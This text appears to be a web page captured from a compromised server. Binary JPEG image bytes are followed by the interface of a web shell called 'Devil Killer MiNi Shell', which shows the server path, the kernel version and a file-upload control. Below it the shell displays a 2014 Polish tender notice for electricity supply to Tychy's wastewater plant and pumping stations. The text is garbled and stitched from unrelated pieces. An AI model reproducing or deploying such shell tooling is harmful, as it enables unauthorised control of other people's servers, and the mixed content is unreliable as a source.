JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/15590-N-2014.html

<p class="kh_header"><b>Tychy: Dostawa energii elektrycznej dla obiektów Oczyszczalni Ścieków oraz pompowni w Tychach</b><br>
<b>Numer ogłoszenia: 15590 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa energii elektrycznej dla obiektów Oczyszczalni Ścieków oraz pompowni w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa energii elektrycznej (zwanej dalej energią), polegająca na sprzedaży przez Wykonawcę na rzecz Zamawiającego energii w rozumieniu ustawy z dnia 10 kwietnia 1997 Prawo Energetyczne (tekst jednolity: Dz. U. z 2012 poz. 1059 z późn. zm.), zwanej dalej ustawą Prawo Energetyczne, w planowanej ilości określonej w ppkt. 3.6.5 dla następujących punktów poboru: Oczyszczalnia Ścieków w Tychach-Urbanowicach przy ul. Lokalnej oraz 30 istniejących pompowni, zlokalizowanych na terenie Gminy Tychy od dnia 01.03.2014r. do dn. 28.02.2015r.
2.Ilość przyłączy = 33.
3.Zamawiający zakwalifikowany jest do grupy taryfowej:
a)B23 - Oczyszczalnia Ścieków Tychy-Urbanowice - 2 przyłącza istniejące,
b)C11 - Pompownie ścieków na terenie Gminy Tychy - 31 przyłączy istniejących.
4.Wykonawca zobowiązuje się do złożenia w imieniu Zamawiającego, Operatowi Systemu Dystrybucyjnego właściwego dla Zamawiającego tj. TAURON Dystrybucja S.A. Oddział w Gliwicach zgłoszenia o zawarciu umowy na zakup energii dla potrzeb Oczyszczalni Ścieków oraz pompowni, wymienionych w ppkt. 3.6.2.  
5.Dostawa energii elektrycznej musi odbywać się na warunkach określonych przepisami ustawy Prawo Energetyczne i Kodeksu cywilnego oraz przepisami wykonawczymi, wydanymi na ich podstawie.
6.Szczegółowy opis zamówienia:
6.1.Wykonawca będzie dostarczał energię, zgodnie z obowiązującymi standardami jakościowymi obsługi odbiorców określonymi w aktach wykonawczych na podstawie ustawy Prawo Energetyczne.
6.2.Miejscem dostarczenia energii są: 
1)Zaciski przekładników znajdujące się w stacji M0579, znajdującej 
się na terenie Oczyszczalni Ścieków w Tychach-Urbanowicach, ul. Lokalna   
-zaciski przekładników prądowych w polu 4 (przyłącze I - licznik podstawowy nr 76835898) 
-zaciski przekładników prądowych w polu 12 (przyłącze II - licznik podstawowy nr 76835896) 
Układ pomiarowo-rozliczeniowy na przyłączu I i II składa się z licznika energii czynnej, biernej indukcyjnej, biernej pojemnościowej - licznik elektroniczny czterokwadratowy ZMD405CT 44.0257 (Sekcja 1 nr 76835 905, sekcja 2 nr 76835 953) oraz licznika kontrolnego ZMD405CT 44.0257 (sekcja 1 nr 76835 922, sekcja 2 nr 76835 997), zainstalowanych w stacji M0579. Liczniki współpracują z przekładnikami prądowymi na każdej sekcji typu 50 5 5 A A A ext. 120 procent, 10VA, kl.0,2, FS5 szt. 3 i przekładnikami napięciowymi typu VTS 25; 25 50 125kV, kl. 0,5. 
2)Pompownia P-1 przy ul. Podleskiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0563370-1. 
3)Pompownia P-2 przy ul. Skotnica w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599155-1. 
4)Pompownia P-3 przy ul. Obywatelskiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0561187-1. 
5)Pompownia P-4 przy ul. Obywatelska w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0561174-1. 
6)Pompownia PsIV przy ul. Czułowska w Tychach, ilość przyłączy =1. 
Nr punktu poboru 06-0563307-01
7)Pompownia P-5 przy ul. Wroniej w Tychach, ilość przyłączy = 1.  
Nr punktu poboru 06-0563373-1. 
8)Pompownia P-6 przy ul. Drozdów w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0563372-1. 
9)Pompownia P-7 przy ul. Kolibrów 1029/82 w Tychach, ilość przyłączy = 1.  Nr punktu poboru 06-0561186-1. 
10)Pompownia P-8 przy ul. Klonowa w Tychach, ilość przyłączy 1. 
Nr punktu poboru 06-0563239-1
11)Pompownia P-9 przy ul. Wiosennej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-1162071-1. 
12)Pompownia P-10 przy ul. Zwierzynieckiej w Tychach, ilość przyłączy = 1. Nr punktu poboru 06-0599165-1. 
13)Pompownia P-11 przy ul. Beskidzka w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599187-1
14)Pompownia P12 przy ul. Cmentarnej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599177-1. 
15)Pompownia P-13 przy ul. Jaskrów w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599164-1. 
16)Pompownia P-14 przy ul. Oświęcimskiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599176-1. 
17)Pompownia P-14A przy ul. Bratków w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599172-1. 
18)Pompownia P-15 przy ul. Jaroszowickiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599170-1. 
19)Pompownia P-16 przy ul. Długiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599167-1. 
20)Pompownia P-17 przy ul. Oświęcimskiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599154-1. 
21)Pompownia P-18 przy ul. Samochodowej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599171-1. 
22)Pompownia P-19 przy ul. Oświęcimskiej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0599166-1. 
23)Pompownia P-20 przy ul. Jana Targiela w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-1208149-1. 
24)Pompownia P-20sPp przy ul. Granicznej w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-0563366-1. 
25)Pompownia P-21 przy ul. Jedności w Tychach, ilość przyłączy = 1. 
Nr punktu poboru 06-3100023-1. 
26)Pompownia P-22 przy ul. Nadrzeczna w Tychach, ilość przyłączy= 1. 
Nr punktu poboru 06-3100051. 
27)Pompownia P-23 przy ul. Jaroszowickiej (obok 16) w Tychach, ilość przyłączy = 1. Nr punktu poboru 06-0599174-1. 
28)Pompownia P-24 przy ul. Władysława Sikorskiego w Tychach, ilość przyłączy = 1. Nr punktu poboru 06-1208148-1. 
29)Pompownia P25 - Tychy-Urbanowice, ul. Główna, ilość przyłączy = 1. 
Nr punktu poboru 06-0599263.
30)Pompownia P-26 przy ul. Rymarskiej w Tychach, ilość przyłączy = 1.
Nr punktu poboru 06-0599207.
31)Pompownia Z przy ul. Targiela w Tychach, ilość przyłączy = 2. 
Nr punktu poboru 06-1208162 i 06-1208161.
6.3.Układ pomiarowo-rozliczeniowy na pompowniach ścieków składa się 
z liczników energii czynnej. 
6.4.Podmiotem odpowiedzialnym za bilansowanie energii elektrycznej jest Wykonawca. 
6.5.Planowany pobór energii:
a) Sumaryczna ilość energii dla Przyłącza I i II - Oczyszczalnia Ścieków Tychy Urbanowice:
- energia pobrana czynna szczyt przedpołudniowy: 70 MWh 
- energia pobrana czynna szczyt popołudniowy: 80 MWh 
- energia pobrana czynna reszta doby: 300 MWh 
b) Sumaryczna ilość energii dla 30 Pompowni: 
- energia czynna: 280 MWh..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.31.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do złożenia oferty Wykonawca winien wnieść wadium w wysokości 3 000,00 PLN (słownie: trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni warunek, jeżeli: 
-załączy do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz oraz
-załączy do oferty aktualną koncesję na prowadzenie działalności gospodarczej 
w zakresie obrotu energią elektryczną, wydaną przez Prezesa Urzędu Regulacji Energetyki.
-posiada aktualną umowę z Operatorem Systemu Dystrybucyjnego właściwego dla Zamawiającego tj. TAURON Dystrybucja S.A. Oddział w Gliwicach, umożliwiającą dostawę energii elektrycznej za pośrednictwem sieci dystrybucyjnej TAURON Dystrybucja S.A. Oddział w Gliwicach do obiektów Zamawiającego (na potwierdzenie warunku Wykonawca złoży oświadczenie       w załączniku nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni warunek, jeżeli: 
-  załączy do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz oraz
-  załączy do oferty wykaz wykonanych głównych dostaw (załącznik nr 5          do siwz), w którym potwierdzi, iż wykonał:
co najmniej 1 główną dostawę o wartości co najmniej 150.000,00 zł brutto/rok polegającą na sprzedaży energii elektrycznej,  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.

W celu potwierdzania w/w warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych głównych dostaw, a w przypadku ciągłych lub okresowych wykaz wykonywanych głównych dostaw sporządzony, zgodnie z załącznikiem nr 5 do SIWZ oraz dowody, potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie tj. poświadczenia, z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze, Wykonawca nie jest w stanie uzyskać poświadczenia, wówczas przekłada własne oświadczenie. 

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia zgodnie z załącznikiem nr 5A do siwz.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, postawiony warunek musi spełniać co najmniej jeden z Wykonawców wspólnie składających ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni warunek, jeżeli: 
-złoży wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni warunek, jeżeli: 
-złoży wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni warunek, jeżeli: 
-złoży wypełnione i podpisane oświadczenie -załącznik nr 2 do siwz oraz 
-potwierdzi, iż posiada opłaconą polisę ubezpieczenia od odpowiedzialności cywilnej (wraz z dowodem jej opłacenia) na sumę ubezpieczenia nie niższą niż 155 000,00 zł, a w przypadku jej braku inny dokument potwierdzający, 
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
Wykonawca może polegać na zdolnościach finansowych oraz sytuacji ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia zgodnie z załącznikiem nr 7 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz Oferty  - załącznik nr 1 do siwz,
2.	Zestawienie cenowe - załącznik nr 1A  do siwz.
3.	Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów - załącznik nr 4 do siwz.
4.	Pisemne zobowiązanie innego podmiotu w zakresie wiedzy i doświadczenia - załącznik nr 5A do siwz.
5.	Pisemne zobowiązanie innego podmiotu w zakresie sytuacji ekonomicznej 
i finansowej załącznik nr 7 do siwz.
6.	Oświadczenie o przynależności Wykonawcy do grupy kapitałowej - załącznik nr 8  do siwz.
7.	Lista podmiotów należących do tej samej grupy kapitałowej - załącznik nr 9 do siwz.
8.	Dokument potwierdzający wniesienie wadium zgodnie z pkt. X. 1. siwz.
9.	W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 u.p.z.p.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z załącznikiem nr 6 do siwz - Istotne Postanowienia Umowy.
1.	Zmiana warunków zawartej umowy wymaga formy pisemnego aneksu pod rygorem nieważności, za wyjątkiem sytuacji określonej w pkt.2c niniejszego paragrafu.
2.	Zmiana umowy jest dopuszczalna w następujących przypadkach:
a)	konieczność wprowadzenia zmian do umowy w następstwie siły wyższej tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia m.in. katastrofa naturalna, katastrofalne działania przyrody (np. ulewne opady deszczu, nadzwyczajne, ponadnormatywne opady śniegu, niezwykłe mrozy), strajk, zamieszki uliczne, pożar, powódź, eksplozja, atak terrorystyczny,
b)	jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na cenę przedmiotu zamówienia,    
c)	jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), dla faktur wystawionych po zmianie stawki podatku, podatek VAT będzie obliczony w obowiązującej stawce, bez konieczności zmiany umowy,  
d)	sprzedaż energii dla punktu, w którym nastąpił znaczący przyrost mocy w związku z dokonaną rozbudową, będzie dokonywana bez konieczności zmiany załącznika nr 2 
do umowy oraz bez konieczności renegocjowania warunków Umowy,
e)	na wniosek Zamawiającego możliwe jest zaprzestanie dostawy energii dla poszczególnych punktów poboru ujętych w Załączniku Nr 1 i nie stanowi ono rozwiązania całej Umowy chyba, że przedmiotem wypowiedzenia są wszystkie punkty poboru określone w Załączniku nr 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A., Al. M. Piłsudskiego 12, 43-100 Tychy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 10:00, miejsce: w siedzibie Regionalnego Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




